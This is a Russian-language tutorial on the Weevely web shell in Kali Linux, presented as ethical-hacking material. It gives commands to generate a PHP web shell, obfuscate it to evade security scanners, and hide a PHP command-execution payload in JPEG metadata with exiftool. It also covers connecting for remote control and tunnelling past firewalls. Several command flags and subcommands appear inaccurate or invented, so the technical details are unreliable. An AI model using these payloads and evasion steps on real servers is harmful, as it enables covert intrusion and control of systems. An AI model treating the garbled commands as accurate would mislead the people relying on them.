Если вы занимаетесь тестированием на проникновение или этическим хакерством, вы, вероятно, сталкивались с мощным инструментом под названием Weevely. Weevely — это веб-оболочка, разработанная специально для Kali Linux и обеспечивающая скрытые средства доступа и управления удаленными системами. В этой статье мы углубимся в тонкости Weevely и рассмотрим различные методы эффективного использования его возможностей.

1. Установка:

Прежде чем мы погрузимся в захватывающий мир Weevely, давайте начнем с процесса установки. Запустите терминал Kali Linux и выполните следующие команды:

sudo apt-get update
sudo apt-get install weevely

2. Основное использование:

После установки доступ к Weevely можно получить с помощью команды weevely. Чтобы установить соединение с удаленной системой, используйте следующий синтаксис:

weevely generate <password> <output.php>

Эта команда создает сценарий веб-шелла на основе PHP, который можно загрузить на целевой сервер для удаленного доступа. Замените <password>на желаемый пароль и <output.php>на имя файла созданной веб-оболочки.

3. Скрытые методы доставки:

Weevely предлагает несколько оригинальных способов доставки веб-оболочки в целевую систему, обеспечивая скрытый доступ. Давайте рассмотрим несколько популярных способов доставки:

а. Запутанный PHP-код: Weevely позволяет генерировать запутанный PHP-код, что затрудняет его обнаружение сканерами безопасности. Используйте следующую команду:

weevely generate --obfuscated <password> <output.php>

б. Полезная нагрузка JPEG: Weevely предоставляет возможность встроить веб-оболочку в изображение JPEG. Этот метод основан на команде exiftoolдля внедрения веб-оболочки в метаданные изображения. Выполните следующие команды:

weevely generate --jpeg <password> <output.jpg>
exiftool -Comment="<?php system(\$_GET['cmd']); ?>" <output.jpg>

4. Командование и контроль:

После того как веб-оболочка успешно доставлена ​​и размещена в целевой системе, пришло время установить управление и контроль (C2) над удаленной машиной. Используйте следующую команду для подключения к веб-оболочке:

weevely <URL> <password>

Замените <URL>URL-адресом сценария веб-шелла и <password>паролем, определенным во время генерации.

5. Расширенные функции:

Weevely предлагает ряд расширенных функций, позволяющих улучшить контроль над целевой системой. Вот несколько примечательных из них:

а. Операции с файлами: Weevely позволяет выполнять различные операции с файлами, такие как загрузка, скачивание, редактирование и даже выполнение файлов в удаленной системе. Ознакомьтесь с командой weevely fileдля эффективного управления файлами.

б. Туннелирование: Weevely обеспечивает переадресацию портов и туннелирование трафика, позволяя вам проходить через брандмауэры и получать доступ к ограниченным ресурсам в удаленной системе. Изучите команду weevely tunnelдля настройки туннелей.

Weevely на Kali Linux открывает мир тайных операций для тестеров на проникновение и этических хакеров. Благодаря мощным возможностям веб-оболочки и скрытым методам доставки Weevely предоставляет надежный набор инструментов для удаленного доступа и управления. Освоив методы, изложенные в этой статье, вы сможете поднять свои навыки тестирования на проникновение на новый уровень, гарантируя безопасность систем, находящихся под вашим наблюдением.